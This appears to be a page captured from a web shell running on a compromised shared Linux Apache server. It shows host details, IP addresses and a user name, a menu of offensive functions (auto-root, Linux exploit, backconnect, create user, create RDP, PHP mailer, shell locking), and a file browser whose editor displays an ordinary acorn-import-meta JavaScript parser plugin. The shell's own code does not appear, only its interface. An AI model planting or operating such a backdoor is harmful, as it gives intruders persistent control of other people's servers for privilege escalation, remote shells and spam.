Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
acorn-import-meta /
[ HOME SHELL ]
Name
Size
Permission
Action
index.js
1.63
KB
-rw-r--r--
package.json
865
B
-rw-r--r--
run_test262.js
797
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
"use strict" const tt = require("acorn").tokTypes const skipWhiteSpace = /(?:\s|\/\/.*|\/\*[^]*?\*\/)*/g const nextTokenIsDot = parser => { skipWhiteSpace.lastIndex = parser.pos let skip = skipWhiteSpace.exec(parser.input) let next = parser.pos + skip[0].length return parser.input.slice(next, next + 1) === "." } module.exports = function(Parser) { return class extends Parser { parseExprAtom(refDestructuringErrors) { if (this.type !== tt._import || !nextTokenIsDot(this)) return super.parseExprAtom(refDestructuringErrors) if (!this.options.allowImportExportEverywhere && !this.inModule) { this.raise(this.start, "'import' and 'export' may appear only with 'sourceType: module'") } let node = this.startNode() if (this.containsEsc) this.raiseRecoverable(this.start, "Escape sequence in keyword import") node.meta = this.parseIdent(true) this.expect(tt.dot) node.property = this.parseIdent(true) if (node.property.name !== "meta") { this.raiseRecoverable(node.property.start, "The only valid meta property for import is import.meta") } if (this.containsEsc) { this.raiseRecoverable(node.property.start, "\"meta\" in import.meta must not contain escape sequences") } return this.finishNode(node, "MetaProperty") } parseStatement(context, topLevel, exports) { if (this.type !== tt._import || !nextTokenIsDot(this)) { return super.parseStatement(context, topLevel, exports) } let node = this.startNode() let expr = this.parseExpression() return this.parseExpressionStatement(node, expr) } } }
Close